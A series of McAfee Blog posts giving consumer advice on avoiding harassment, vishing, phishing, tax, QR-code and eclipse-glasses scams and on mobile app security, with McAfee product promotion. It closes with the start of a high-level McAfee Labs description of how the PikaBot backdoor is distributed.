Login
Some conversations on social media can get … heated. Some can cross the line into harassment. Or worse.
Harassment on social media has seen an unfortunate rise in recent years. Despite platforms putting in reporting mechanisms, policies, and even using AI to detect and remove harmful speech, people are seeing more and more harassment on social media.
Yet even as it becomes more prevalent, nothing about it is usually. Or acceptable. No, you can’t prevent social media harassment. Yet you can protect yourself in the face of these attacks.
In 2023, research showed that 52% of American adults said they experienced harassment at some point online. That’s up from 40% in 2022. Also in 2023, 33% said they experienced it in the last year, a jump of 10% from 2022.i
The same trend follows for teens, where 51% of them said they experienced harassment in the past year, compared to 36% in the year prior.ii
Earlier research conducted in the U.S. tracked a significant rise in harassment online between 2014 and 2020. This included the doubling or the near doubling of the most severe forms of online harassment.iii
Our own research in 2022 also noted a rise of another kind — worry about online harassment. Globally, 60% of children said they were more worried that year about social media harassment (cyberbullying) compared to the year prior. Their parents showed yet more concern, with 74% of them more worried that year about their child being harassed than the last.iv
Stats are one thing, yet behind each figure stands a victim. Harassment takes a hard toll on its victims — emotional, financial, and sometimes physical. That becomes clear the moment you look at the forms it can take.
Social media harassment includes:
It includes other acts, such as:
In practice, the results can get ugly. Scanning press releases from various state attorneys general, you’ll find unflinching accounts of harassment. Like a targeted, three-year cyberstalking campaign against a victim and that person’s parents, coworkers, siblings, and court-mandated professionals.v Another, where the harasser attempted to defame his victim through a fake LinkedIn profile — and further doxed his victim by publicly posting source code the victim had written worth millions of dollars.vi
All of this serves as a reminder. Harassment can quickly turn into a crime.
The unfortunate fact remains that you can’t prevent social media harassment. Some people simply find themselves driven to do it. You can take several steps to shield yourself from attackers and deny them the info they need to fuel their attacks.
Secure your accounts.
Account security should be a high priority for you, your loved ones, and anyone else. That’s especially true during periods of harassment. Every account you have should be secured with a complex password — at least 12 to 14 characters long, with numbers, capital letters, lowercase letters, and symbols. And with two-factor authentication.
Two-factor authentication is especially important when it comes to account security. The reason is simple: a lot of harassers are tech-savvy, and enjoy taking over a victim’s account to make offensive comments in their name and damage their reputation.
Two-factor authentication prevents account takeovers like this. It requires a user to know the password and username for an account, along with another way they can prove they are who they say they are. Often that involves a code sent to their smartphone that they can use to verify their identity. At McAfee, we recommend you use two-factor authentication on any account that offers it.
Control who can follow you.
Social media platforms offer plenty of ways you can lock down your privacy, even as you remain “social” on them to some degree. Our Social Privacy Manager can help you be as private as you like. It helps you adjust more than 100 privacy settings across your social media accounts in only a few clicks, so your personal info is only visible to the people you want to share it with. By making yourself more private, you deny a potential harasser an important source of info about you, in addition to your friends, family, and life overall.
Limit what you share online.
Limit how much info you share about yourself on social media websites. Addresses, phone numbers, and locations shouldn’t be shared in posts and shouldn’t be included in biographies. Attackers can use this type of info to make false threats and, in some cases, falsify crimes to elicit a police response — this is a technique called “SWATTING” and it’s quite serious.vii
In some instances, harassers gather info about their victims on data brokers or “people finder” sites. Some of this info can get pretty detailed, and these sites will sell it to anyone. You can clean up that info, however. Our Personal Data Cleanup scans data broker sites and shows you which ones are selling your personal info. It also provides guidance on how you can remove your data from those sites — or remove it for you, depending on your plan.
Report the harassment to the social media platform.
If you find yourself targeted, don’t respond. That’s what the harasser wants. Use your social media platform’s tools to block and then report the harasser. Many platforms have web pages dedicated to harassment that walk you through the process.
Report harassment to the authorities.
First off, if you feel that you are in immediate danger, contact your local authorities for help.
In many cases, harassment is illegal. Slander, threats, damage to your professional reputation, doxing, and many of the examples mentioned earlier can amount to a crime. There are options for victims, legally speaking. If you feel a harassment campaign has crossed the line, then it’s time to contact the authorities. Bring proof of harassment. Take screenshots of everything and submit them as part of your complaint.
Talk with trusted family members and friends.
We’ve seen just how damaging and painful harassment can be. Let trusted people in your life know what’s happening. Lean on them for support. And have them help you find any resources you might need in the wake of harassment, such as counseling or even legal assistance. You might find this tough to do, yet realize that you’re not at fault here. Any ugliness you’re dealing with comes from the hands of a harasser. Not yours. Close family and friends will recognize this.
[i] https://www.adl.org/resources/report/online-hate-and-harassment-american-experience-2023
[ii] https://www.adl.org/resources/report/online-hate-and-harassment-american-experience-2023
[iii] https://www.pewresearch.org/internet/2021/01/13/the-state-of-online-harassment/
[vii] https://www.theguardian.com/technology/2016/apr/15/swatting-law-teens-anonymous-prank-call-police
The post How to Protect Yourself From Social Media Harassment appeared first on McAfee Blog.
In a world where digital communication dominates, the art of scamming has evolved into a sophisticated game of deception. A recent story in The Cut featured a seasoned personal finance journalist falling prey to an Amazon scam call and being duped out of a staggering $50,000. The story serves as a stark reminder that anyone, regardless of their expertise or background, can become a victim of vishing. Short for “voice phishing,” vishing is a form of cybercrime where scammers use phone calls to deceive individuals into revealing personal or financial information.
Contrary to common belief, it’s not just the elderly or technologically naive who fall victim to such schemes. One national survey found that only 15% of Gen Z and 20% of millennials express concern about falling victim to financial fraud. However, the Federal Trade Commission paints a different picture, indicating that younger adults are over four times more likely to report losing money to fraud than older adults. This dissonance highlights the need for heightened awareness and education across all age groups.
Vishing is a form of fraud that exploits the trust we place in phone calls. It operates through various strategies, all aimed at tricking victims. For example, wardialing involves automated systems dialing phone numbers to find vulnerable targets. VoIP, or Voice over Internet Protocol, allows scammers to make calls over the internet, often making it harder to trace them.
Caller ID spoofing is another tactic where scammers manipulate the caller ID to display a trusted or familiar number, tricking recipients into answering. These techniques create a false sense of legitimacy, making it difficult for individuals to distinguish between real and fraudulent calls.
Vishing exploits trust and naivety to obtain sensitive information or conduct unauthorized transactions. Humans have always been vulnerable to scams, but the abundance of personal data available on the dark web, obtained from various data breaches and leaks, has significantly heightened the threat. For example, LinkedIn experienced a data breach in 2021 that exposed data from 700 million users on a dark web forum.
A data breach like that presents scammers with a treasure trove of details about potential victims, enabling them to personalize their attacks with alarming precision. By incorporating specific details gleaned from these data sources, scammers can craft convincing narratives and establish a false sense of trust and credibility with their targets. Consequently, even individuals who exercise caution in safeguarding their personal information may find themselves vulnerable to vishing scams.
As a result, individuals must remain vigilant and adopt comprehensive security practices. Familiarizing oneself with the telltale signs of a scam call is the first line of defense. Be wary of:
If an unsolicited call seems suspicious, hang up the phone. Verify the caller’s legitimacy through independent channels, such as contacting the organization directly using a trusted phone number. In addition to recognizing signs of scam calls, implementing call-blocking technologies or screening unknown numbers can reduce exposure to potential scams. McAfee Mobile Security’s call blocker feature can be employed to diminish the volume of incoming calls.
The alarming reality is that vishing knows no bounds and can affect any age or demographic. The unfortunate ordeal of the seasoned journalist losing $50,000 serves as a sobering reminder of the perils lurking behind seemingly innocuous phone calls. Vishing demands vigilance and awareness. Security software and apps can significantly increase the overall security of your phone by detecting and preventing various threats, such as malware, phishing attempts, and unauthorized access to sensitive information.
By adopting proactive measures, we can fortify our defenses against vishing scams and safeguard our financial well-being. Stay informed, stay vigilant, and stay protected.
The post A Finance Journalist Fell Victim to a $50K Vishing Scam – Are You Also at Risk? appeared first on McAfee Blog.
In today’s digital landscape, distinguishing between legitimate communications and phishing attempts can feel like navigating a labyrinth blindfolded. Phishing is a deceptive tactic where cybercriminals use fraudulent emails, texts, or messages to trick individuals into revealing sensitive information or clicking on malicious links. And let’s not forget its crafty sibling, “smishing” – the text message iteration of this digital charade.
Now that most brands and even government agencies communicate with consumers via text or email, it’s hard to know whether a message is legit or not. Consider the United States Postal Service, which should be solely focused on dependable package delivery, yet is frequently tasked with warning individuals against clicking on links from unsolicited messages impersonating the postal service.
Many people are concerned that they’ll unwittingly open an official-looking email or text only to become victims of a scam. Fortunately, there are steps you can take to educate yourself and establish safeguards against phishing and smishing attempts.
Here are five steps for staying cyber savvy and protecting yourself from phishing scams:
In a world where even simple emails and text messages can harbor malevolent intent, it’s crucial to fortify yourself with knowledge and vigilance. Using multifactor authentication and learning how to spot scam messages will help you avoid scams. If you want additional protection, our AI-powered Scam Protection scans text messages and alerts users or filters out the text if it detects a scam link. The software also blocks links from scam emails, texts, and social media messages in the event you accidentally click one. It’s not always easy to spot phishing scams, but we can help by providing that first — and second line of defense.
The post Stay Cyber Savvy: Your 5-Step Guide to Outsmarting Phishing Scams appeared first on McAfee Blog.
While last-minute tax filers stare down the clock, scammers look for easy pickings. Tax scams are in full swing as April 15th approaches, and we have a rundown of the top ones making the rounds this year.
For starters, the stakes this year remain the same as ever. Scammers are taking advantage of the stress and uncertainty that comes with tax season as they target people’s personal info, money, or both. Their avenues of attack remain the same as well, via email, texts, direct messages, and the phone.
Yet there’s a new wrinkle this year. Scammers have tapped into AI tools that make their scams look and feel far more sophisticated than ever.
We saw the first stirrings of AI-driven scams last year as AI tools first entered the marketplace. This year, AI-driven scams feature more and more in the landscape of threats. Scammers use them to generate images, write copy, and build websites in a fraction of the time that it once took. While they still make some of the design and writing mistakes they’ve made in the past, they make far fewer of them.
We have a couple of tax scams to share from the many we’ve uncovered. The first one involves a popular brand of tax software here in the U.S.
Example of a scammer email
At first blush, this bogus email looks pretty legit. At first. The layout, photograph, and link all look like standard fare for an email. Though looking more closely, you can spot several AI fingerprints all over it.
For one, big brands like TurboTax have writers, editors, and reviewers who comb over copy before it gets approved for release. Here, the headline breaks a pretty standard formatting rule. In “headline case” writing, the “with” should be lowercase. Sure, mistakes get made, and this might be one example. Yet the problems go deeper than that.
Read the fine print. You’ll see that the grammar is off. The paragraph overall has a broken feel to it. You’ll also see that the copy mentions “market leader” twice — and awkwardly so. And what company mentions its competitors in an email like this? They’re not out to boost competitors.
Lastly, the email spells out the company’s name wrong in the fine print. It’s “TurboTax,” not “Turbo Tax with License Code.” All of this points to an obvious fake. But only by looking closely at it. It’s as if the scammers prompted an AI chatbot with “Describe what TurboTax is” and got this as a response.
Granted, that represents an example of rather sloppy work. The next example looks more convincing. This time, the scammers impersonate the IRS:
Example of a scammer website
We discovered this fake IRS site when our McAfee Labs team investigated a link sent in an email. The bait is the promise of getting a tax ID number for a business or organization. The hook is this bogus site designed to harvest personal and business info.
If you’ve visited the IRS site recently, you’ll recognize the look and feel of an IRS webpage quickly. It seems familiar enough, yet once again a closer look reveals a few things.
First, a small grammatical error rears its head in the copy. The term “setup” is a noun, yet the copy uses it as a verb. It should read “set up” instead. Granted, this is a common error. Many sites make it, yet it’s a red flag nonetheless. Next, the contact method in the top right raises yet another. Contact “an EIN expert” via email during set hours? Set hours are for phone calls, not email.
We omitted the final telltale sign — the URL. It was clearly a fake and not the official irs.gov address.
In all, it shows just how cagey tax scammers can be today. Particularly with AI. It puts a fresh look on some old tactics, making scams tougher to spot.
Sketchy email attachments — the five most popular types.
This classic is back. Scammers spread all manner of malware with email attachments. One example: spyware that steals info as you type usernames and passwords as you log into your accounts. Another: ransomware that holds the data on your device hostage until you pay. Maybe. The list goes on, yet scammers always try to package it up in a way that looks legit.
One way they pull that off is with a phony tax document bundled up in a .pdf document. In fact, the .pdf format marks the number one file type that hackers and scammers use in their attacks. By our count, it tops the number two file type by a ratio of roughly 6 to 1.
Here are the top five file types used by scammers and hackers:
What makes the .pdf format so popular? People trust it. It gets commonly used in business, and many legitimate tax forms come in that format. However, it also offers a versatile platform for exploits. Hackers and scammers can embed malicious links and content within them. So clicking what’s inside that .pdf doc can lead to trouble, say in the form of a malicious website designed to steal personal info.
Starting in the second half of last year, we noted a spike in malicious attachments that used the .pdf format. Another reason that makes .pdf files so popular, email filters tend to focus on other file types like the executable .exe format. So, a .pdf has a better shot at slipping through.
Our advice:
As always, strong antivirus software can detect and protect you from malicious email attachments. Our Next-gen Threat Protection found in all our McAfee+ plans once again proves itself as a top option for antivirus. Results from the independent lab AV-TEST in December 2023 saw it block 100% of entirely new malware attacks in real-world testing. It likewise scored 100% against malware discovered in the previous four weeks. In all, it received the highest marks for protection, performance, and usability — earning it the AV-TEST Top Product certification.
Tax time phishing scams.
Phishing scams crop up in plenty of places and take plenty of forms. As in years past, we see scammers cranking up their bogus texts, direct messages, and emails. They all follow the tax season theme, yet they take different approaches to roping in victims. Some include:
Additionally, many phishing attacks point people to malicious websites — once again that steal personal info. We’ve seen a spike in malicious tax-related URLs starting in the second half of last year as well.
Our advice:
You can absolutely protect yourself from phishing scams. Now with the help of AI. McAfee Scam Protection detects suspicious URLs with AI before they’re opened or clicked on. This takes the guesswork out of those sometimes convincing-looking messages by letting you know if they’re fakes. If you accidentally click or tap on a suspicious link in a text, email, social media, or browser search, it blocks the scam site from loading. You’ll find McAfee Scam Protection across our McAfee+ plans.
Fake charity scams also crop up this time of year.
Whether it’s for natural disaster aid, aiding refugees in war-torn regions, or even protecting animals and pets, scammers set up phony charities with the aim of pulling heartstrings. And then stealing money as a result.
Scammers reach out with the usual methods, by email, text, direct message, and sometimes phone calls as well. They all share one thing in common. They all give potential victims a chance to support a cause that they care for and get a tax credit in return. Yet with these scams, the charity doesn’t exist. Instead, money and personal info end up in the hands of scammers.
Our advice:
Yet you have several ways you can spot a fake charity. For one, the message often has a pressing, almost alarming, tone. One that urges you to “act now.” Before acting, take a moment. Research the charity. See how long they’ve been in operation, how they put their funds to work, and who truly benefits from them.
Likewise, note that some charities pass along more money to their beneficiaries than others. Generally, most reputable organizations only keep 25% or less of their funds for operations, while some less-than-reputable organizations keep up to 95% of funds, leaving only 5% for advancing the cause they advocate. In the U.S., the Federal Trade Commission (FTC) has a site full of resources so that you can make your donation truly count. Resources like Charity Watch and Charity Navigator, along with the BBB’s Wise Giving Alliance can also help you identify the best charities.
Keep an ear out for scam calls.
Scammers like to pick up the phone too. A popular form of attack involves “the call from the IRS.” Typically, a recorded message notifies the recipient that they owe money. And because scammers know just how jarring a call from the IRS can be, they apply heavy pressure in the message.
In the past, we’ve heard messages that threatened fines, jail time, and revoking driver’s licenses. They’ve mentioned the police and other law enforcement agents in them as well, just to turn up the heat.
Now with AI, scammers can create robocalls that sound highly realistic in only moments of time. It’s as simple as writing a few lines of a script, feeding it into an AI tool, and then generating an audio file. No need for another person to record the message. AI takes care of it all.
Our advice:
The best way you can avoid falling for this scam is by knowing what the IRS will and will not do when they contact you. From the irs.gov website, the IRS will not:
Lastly, also know that the IRS is here to help. The agency offers a full help page with online resources, along with several ways you can contact the IRS for help. If you have any questions about a notification that you received, contact them.
While scammers have a wealth of tools available to them, you have one tool that protects you from all kinds of threats. Comprehensive online protection software like McAfee+ offers yet more ways to steer clear of tax scams.
In addition to the antivirus and scam protection features we mentioned, it can make you more private on social media, which can prevent scammers from profiling you. It can also remove your personal info from the data broker sites scammers use to contact their victims. (Granted, scammers have to get your contact info from somewhere, and these sites offer that info, plus much more.) Also, a VPN can help you connect and file your taxes even more securely, so what you do stays private.
And if the unfortunate happens, our identity theft coverage can help you recover. It provides $2 million in identity theft coverage and a licensed recovery expert who can help restore your identity.
Yes, we’re seeing plenty of old scams with new twists this year. Yet the same ways you can protect yourself from them only get better and better.
The post The Top Tax Scams of 2024 appeared first on McAfee Blog.
It’s that time of year again – tax season! Whether you’ve already filed in the hopes of an early refund or have yet to start the process, one thing is for sure: cybercriminals will certainly use tax season as a means to get victims to give up their personal and financial information. This time of year is advantageous for malicious actors since the IRS and tax preparers are some of the few people who actually need your personal data. As a result, consumers are targeted with various scams impersonating trusted sources like the IRS or DIY tax software companies. Fortunately, every year the IRS outlines the most prevalent tax scams, such as voice phishing, email phishing, and fake tax software scams. Let’s explore the details of these threats.
So, how do cybercriminals use voice phishing to impersonate the IRS? Voice phishing, a form of criminal phone fraud, uses social engineering tactics to gain access to victims’ personal and financial information. For tax scams, criminals will make unsolicited calls posing as the IRS and leave voicemails requesting an immediate callback. The crooks will then demand that the victim pay a phony tax bill in the form of a wire transfer, prepaid debit card or gift card. In one case outlined by Forbes, victims received emails in their inbox that allegedly contained voicemails from the IRS. The emails didn’t actually contain any voicemails but instead directed victims to a suspicious SharePoint URL. Last year, a number of SharePoint phishing scams occurred as an attempt to steal Office 365 credentials, so it’s not surprising that cybercriminals are using this technique to access taxpayers’ personal data now as well.
In addition to voice phishing schemes, malicious actors are also using email to try and get consumers to give up their personal and financial information. This year alone, almost 400 IRS phishing URLs have been reported. In a typical email phishing scheme, scammers try to obtain personal tax information like usernames and passwords by using spoofed email addresses and stolen logos. In many cases, the emails contain suspicious hyperlinks that redirect users to a fake site or PDF attachments that may download malware or viruses. If a victim clicks on these malicious links or attachments, they can seriously endanger their tax data by giving identity thieves the opportunity to steal their refund. What’s more, cybercriminals are also using subject lines like “IRS Important Notice” and “IRS Taxpayer Notice” and demanding payment or threatening to seize the victim’s tax refund.
Cybercriminals are even going so far as to impersonate trusted brands like TurboTax for their scams. In this case, DIY tax preparers who search for TurboTax software on Google are shown ads for pirated versions of TurboTax. The victims will pay a fee for the software via PayPal, only to have their computer infected with malware after downloading the software. You may be wondering, how do victims happen upon this malicious software through a simple Google search? Unfortunately, scammers have been paying to have their spoofed sites show up in search results, increasing the chances that an innocent taxpayer will fall victim to their scheme.
Money is a prime motivator for many consumers, and malicious actors are fully prepared to exploit this. Many people are concerned about how much they might owe or are predicting how much they’ll get back on their tax refund, and scammers play to both of these emotions. So, as hundreds of taxpayers are waiting for a potential tax return, it’s important that they navigate tax season wisely. Check out the following tips to avoid being spoofed by cybercriminals and identity thieves:
File before cybercriminals do it for you. The easiest defense you can take against tax season schemes is to get your hands on your W-2 and file as soon as possible. The more prompt you are to file, the less likely your data will be raked in by a cybercriminal.
Keep an eye on your credit and your identity. Keeping tabs on your credit report and knowing if your personal information has been compromised in some way can help prevent tax fraud. Together, they can let you know if someone has stolen your identity or if you have personal info on the dark web that could lead to identity theft.
Watch out for spoofed websites. Scammers have extremely sophisticated tools that help disguise phony web addresses for DIY tax software, such as stolen company logos and site designs. To avoid falling for this, go directly to the source. Type the address of a website directly into the address bar of your browser instead of following a link from an email or internet search. If you receive any suspicious links in your email, investigating the domain is usually a good way to tell if the source is legitimate or not.
Protect yourself from scam messages. Scammers also send links to scam sites via texts, social media messages, and email. McAfee Scam Protection can help you spot if the message you got is a fake. It uses AI technology that automatically detects links to scam URLs. If you accidentally click, don’t worry, it can block risky sites if you do.
Clean up your personal info online. Crooks and scammers have to find you before they can contact you. After all, they need to get your phone number or email from somewhere. Sometimes, that’s from “people finder” and online data brokers that gather and sell personal info to any buyer. Including crooks. McAfee Personal Data Cleanup can remove your personal info from the data broker sites scammers use to contact their victims.
Consider an identity theft protection solution. If for some reason your personal data does become compromised, be sure to use an identity theft solution such as McAfee Identity Theft Protection, which allows users to take a proactive approach to protect their identities with personal and financial monitoring and recovery tools to help keep their identities personal and secured.
The post How to Steer Clear of Tax Season Scams appeared first on McAfee Blog.
Four in ten Americans say they use peer-to-peer payment services, like Venmo, PayPal, or Apple Pay, at least once a month. These platforms have made it even easier to send money by adding QR codes that people can quickly scan to pull up someone’s profile and complete a payment. Two-thirds of restaurants have started including QR codes on tables to access menus. Scanning QR codes has become a normal, convenient way to exchange money or information.
Unfortunately, scammers are always looking for ways to take advantage of moments when people are primed to part with their money. The Federal Trade Commission is warning that scammers now use QR codes to hide harmful links to steal personal information. This new type of phishing attack, called “quishing,” highlights how scamming methods are constantly changing. In response, artificial intelligence (AI) is becoming an even more crucial part of defending against scammers.
To protect yourself against phishing attacks, it’s crucial to remain vigilant and employ proactive measures. Make sure to scrutinize all incoming emails, text messages, or social media communications for any signs of suspicious or unsolicited requests, especially those urging immediate action or requesting sensitive information.
Avoid clicking links, downloading attachments, or scanning QR codes from unknown or untrusted sources. Check the legitimacy of the sender by cross-referencing contact information with official sources or contacting the organization directly through trusted channels.
Before accepting where a QR code is going to take you, carefully examine the associated URL. Verify its authenticity by scrutinizing for any discrepancies, such as misspellings or altered characters, especially if it resembles a familiar URL.
Safeguard your mobile device and accounts by regularly updating the operating system. Additionally, bolster the security of your online accounts by implementing robust passwords and integrating multi-factor authentication measures to thwart unauthorized access.
As fraudsters continually evolve their tactics, distinguishing between what’s real and what’s fake becomes increasingly challenging. However, there is formidable technology available to safeguard against their schemes. AI can analyze vast amounts of data in real-time to detect patterns and anomalies indicative of fraudulent behavior. By continuously learning from new data and adapting algorithms, AI can stay ahead of evolving fraud tactics.
The McAfee+ suite of identity and privacy protections uses AI for identity protection, transaction monitoring, credit monitoring, and proactive Scam Protection to keep you safe from even the most sophisticated scam attempts. Scam Protection employs AI technology to block risky sites, serving as a secondary defense against accidental clicks on spam links. This ensures that even after being tricked into clicking, your device won’t open the fraudulent site.
Don’t leave your digital defenses to chance. See for yourself what advanced security looks like today.
The post How to Protect Against New Types of Scams Like QR Phishing appeared first on McAfee Blog.
Scammers are turning a buck on the eclipse. A rash of eclipse scams have appeared online, many involving the sale of unsafe viewers and solar eclipse glasses.
With the eclipse making its way from Texas, through the Midwest, and up through the Northeast on April 8th, people increasingly want to get their hands on equipment to view it. And as it always is when it comes to big events and scarcity, scammers rush in.
A map of the eclipse path – GreatAmericanEclipse.com
As such, the Better Business Bureau (BBB) issued a consumer warning about the sale of cheap, knockoff solar eclipse glasses.i Worse yet, viewing the eclipse with these bogus glasses can harm your eyes. So as if getting ripped off wasn’t bad enough, this scam can damage a person’s vision.
Here, we’ll put you on the path to buying a safe set of viewing glasses — and offer several ways you can avoid buying knockoffs from a scammer.
The American Astronomical Society has a list you’ll find helpful. With a visit to their page dedicated to suppliers of solar filters and viewers, you’ll have your pick of places where you can purchase. The list is long, featuring a mix of online and retail outlets where you can get safe, approved gear for viewing.
Also, check out the society’s page on safe viewing for the eclipse. It covers what you need to know to view the eclipse safely, from how to use a viewer, the ISO 12312-2 standard that all viewers must adhere to, and how to properly clean viewers so they remain safe.
How do so many scams ramp up so quickly for such a highly specific event? It doesn’t take much to spin up e-commerce sites and pump out ads nowadays. Thanks to a host of low-cost and easy-to-use tools for publishing and advertising online, scammers of all sizes can create bogus shopping experiences much more quickly than ever.
And as we’ve discussed so often in our blogs as of late, scams look and feel increasingly sophisticated today. AI gives scammers ready access to design tools, audio and video creation tools, copywriting bots, and more. Then add in the ease with which scammers can post their ads in search and on social media, and they have quick and ready ways of reaching potential victims.
Even so, a few extra steps and a bit of caution can help you avoid these scams.
1. Stick with known, legitimate retailers online.
This is a great piece of advice to start with. Directly typing in the correct address for online stores and retailers is a prime way to avoid scammers online. In the case of retailers that you don’t know much about, the BBB asks shoppers to do their research. Ensure that the retailer has a good reputation. The BBB makes that easier with a listing of retailers you can search by typing in their name.
2. Research new sellers for their history and reviews.
Never heard of that retailer before? See when they launched their website. A relatively new site might be a sign that it’s part of a scam.
A quick visit to the ICANN (Internet Corporation for Assigned Names and Numbers) website can show you certain background info for any website you type in. Given how quickly and easily scammers can register and launch a website, this kind of info can help you sniff out a scam.
Of course, it might also indicate a new business that’s entirely legitimate, so a little more digging is called for. That’s where reviews come in. Aside from the resources listed above, a simple web search of “[company name] reviews” or “[company name] scam” can help you discover if the retailer is legit.
3. Look for the lock icon in your browser when you shop.
Secure websites begin their addresses with “https,” not just “http.” That extra “s” stands for “secure,” which means that it uses a secure protocol for transmitting sensitive info like passwords, credit card numbers, and the like over the internet. It often appears as a little padlock icon in the address bar of your browser, so double-check for that. If you don’t see that it’s secure, it’s best to avoid making purchases on that website.
4. Pay with a credit card instead of your debit card.
Credit cards offer fraud protections that debit cards don’t. Another key difference: when fraud occurs with a debit card, you fight to get your money back — it’s gone straight out of your account. With a credit card, the issuer fights to get their money back. They’re the ones who take the financial hit.
Additionally, in the U.S., the Fair Credit Billing Act offers the public protection against fraudulent charges on credit cards. The act gives citizens the power to dispute charges over $50 for goods and services that were never delivered or otherwise billed incorrectly. Note that many credit card companies have their own policies that improve upon the Fair Credit Billing Act as well. However, debit cards aren’t afforded the same protection under the Act. Avoid using a debit card while shopping online and use your credit card instead.
5. Protect your devices for shopping.
A complete suite of online protection software like McAfee+ can offer layers of extra security while you shop. It includes scam protection that can block malicious and questionable links that might lead you down the road to malware or a phishing scam — along with a password manager that can create and securely store strong, unique passwords.
If you have some last-minute bookings and travel in your plans for the eclipse, look out for online rental fraud scams. With a few images cobbled together from the internet, scammers list phony properties and seek to get paid outside legitimate rental platforms — leaving you short of funds and short of a place to stay when you finally arrive.
You can avoid these scams rather easily. Trust a trusted platform. Book your vacation rental through a reputable outlet. Vacation rental platforms like Airbnb and VRBO have policies and processes in place that protect renters from scammers.
You have several other ways you can avoid booking scams …
First, look at the listing.
Do the photos look grainy or like they came from a magazine? Do a reverse image search on the photo and see what comes up. It might be a piece of stock photography designed to trick you into thinking it was taken at an actual property for rent. Also, read the reviews for the property. Listings with no reviews are a red flag.
Only communicate on the platform.
The moment a host asks to communicate outside of the platform is another red flag. Scammers will try to lure you off the platform where they can request payment in forms that are difficult to recover or trace after you realize you’ve been scammed. That includes methods such as certified checks, money transfers like Western Union, and online payment apps like Zelle. Generally, when that money is gone, it’s gone for good.
Only pay on the platform.
Likewise, paying for your rental outside the platform might also go against the terms of service, as in the case of Airbnb. Or, as with VRBO, paying outside the platform voids their “Book with Confidence Guarantee,” which offers you certain protections. Use the platform to pay and use a credit card when you do. In the U.S., the Fair Credit Billing Act allows you to dispute charges. Additionally, some credit cards offer their own anti-fraud protections that can help you dispute a billing.
With big events comes scarcity. Postseason sports and merch. Holiday shopping and hot gifts. Vacation time and rentals at popular destinations. Scammers love this combination. With people in a rush to buy or book, scammers take advantage. As we now see, we can add eclipses to that list, just as we saw with the 2017 eclipse.
In addition to the advice above, take your time and ensure a safe purchase. Given that variants of this scam involve phony, unsafe viewing glasses, take the extra care that your vision absolutely deserves. Go with a reputable retailer with ISO-approved lenses.
The post How to Avoid Solar Eclipse Scams appeared first on McAfee Blog.
Smartphones have enabled a whole new digital world, where apps are gateways to just about any service imaginable. However, like many technological developments, mobile app proliferation can be a bit of a two-edged sword. A report analyzing more than 1 billion smartphone transactions found 45,000 malicious mobile apps, many of which were in the gaming category.
From ad fraud to taking advantage of embedded system security issues, fraudsters are consistently targeting smartphone apps. The trouble is that it’s not always immediately clear which apps pose a threat in a world where one in 36 mobile apps are considered high-risk.
These security concerns require a proactive approach with the ability to spot the signs of fraud or malice so that those apps can be avoided from the get-go. That’s where the four Rs of personal mobile security come into play.
Review
Staying informed about common scam tactics and emerging threats through reliable cybersecurity resources can empower consumers to make informed decisions and recognize potential risks more effectively. Our annual Consumer Mobile Threat Report always gives up-to-date information about the cyberattack landscape.
Understanding what a malicious or scam app looks like can help you avoid downloading a fraudulent app. For example, many fraud apps have very short descriptions or reviews from people who have previously been duped. In addition to scrutinizing the descriptions and reviews of apps, it’s essential to download apps only from trusted sources such as official app stores like Google Play Store or Apple App Store. Third-party app stores or unknown websites may host malicious apps.
Re-check
Fraudsters excel at creating seemingly legitimate apps to carry out scams, often by deploying deceptive tactics such as requesting unnecessary permissions or operating stealthily in the background. Exercise caution and conduct thorough checks of device settings whenever installing a new app.
It’s also essential to remain vigilant for indicators of suspicious activity, especially if you may have installed apps without security checks in the past. Be on the lookout for anomalies, such as unauthorized subscriptions, unfamiliar social media logins, or unusually rapid battery drain, which could signal the presence of fraudulent apps operating without their knowledge. Some malicious apps may also consume data in the background, leading to unusual spikes in data usage. Regularly monitoring data usage can help individuals detect and address any unauthorized app activity.
Revoke
Over time, it’s easy to inadvertently grant excessive permissions to apps or connect accounts to services that you no longer use or trust. This can create vulnerabilities that malicious actors could exploit to gain unauthorized access to sensitive information.
Conduct an app review on your phone and revoke permissions or access granted to apps or services that are no longer needed or trusted. It’s essential to regularly audit and remove unnecessary permissions, apps, or connections to minimize the potential attack surface and reduce the risk of unauthorized access.
Reinforce
Reinforce your security posture with modern tools. Antivirus software remains a cornerstone of digital defense, offering proactive detection and mitigation of various threats, including malware, ransomware, and phishing attempts. For enhanced protection, consumers can opt for comprehensive security suites such as McAfee+, which not only includes antivirus capabilities but also integrates features like firewall protection, secure browsing, and identity theft prevention.
By leveraging these advanced security solutions, users can significantly reduce their vulnerability to cyberattacks and safeguard their personal and sensitive information effectively. Additionally, staying informed about emerging threats and regularly updating security software ensures ongoing resilience against evolving cyber threats in today’s dynamic digital landscape.
The post The Four Rs of Personal Mobile Security appeared first on McAfee Blog.
Authored by Anuradha and Preksha
PikaBot is a malicious backdoor that has been active since early 2023. Its modular design is comprised of a loader and a core component. The core module performs malicious operations, allowing for the execution of commands and the injection of payloads from a command-and-control server. The malware employs a code injector to decrypt and inject the core module into a legitimate process. Notably, PikaBot employs distribution methods, campaigns, and behavior reminiscent of Qakbot.
PikaBot, along with various other malicious loaders like QBot and DarkGate, heavily depends on email spam campaigns for distribution. Its initial access strategies are intricately crafted, utilizing geographically targeted spam emails tailored for specific countries. These emails frequently include links to external Server Message Block (SMB) shares hosting malicious zip files.
SMB shares refer to resources or folders on a server or computer accessible to other devices or users on a network using the SMB protocol. The threat actors frequently exploit such shares for malware distribution. In this instance, the act of downloading and opening the provided zip file leads to PikaBot infection.
During February 2024, McAfee Labs observed a significant change in the campaigns that distribute Pikabot.
Pikabot is distributed through multiple file types for various reasons, depending on the objectives and nature of the attack. Using multiple file types allows attackers to exploit diverse attack vectors. Different file formats may have different vulnerabilities, and different ways of detection by security software so attackers may try various formats to increase their chances of success and evade detection by bypassing specific security measures.
Attackers often use file types that are commonly trusted by users, such as Zip or Office documents, to trick users into opening them. By using familiar file types, attackers increase the likelihood that their targets will interact with the malicious content. Malware authors use HTML with JavaScript features as attachments, a common technique, particularly when email formatting is converted to plain text, resulting in the attachment of the HTML content directly to the email. Attackers use SMB to propagate across the network and may specifically target SMB shares to spread their malware efficiently. Pikabot takes advantage of the MonikerLink bug and attaches an SMB link in the Outlook mail itself.
Figure 1. Distinctive Campaigns of Pikabot
Attackers demonstrated a diverse range of techniques and infection vectors in each campaign, aiming to deliver the Pikabot payload. Below we have summarized the infection vector that has been used in each campaign.
It is uncommon for an adversary to deploy so many attack vectors in the span of a month.
In this section, a comprehensive breakdown of the analysis for each campaign is presented below.
In this campaign, Pikabot is distributed through a zip file that includes an HTML file. This HTML file then proceeds to download a text file, ultimately resulting in the deployment of the payload.
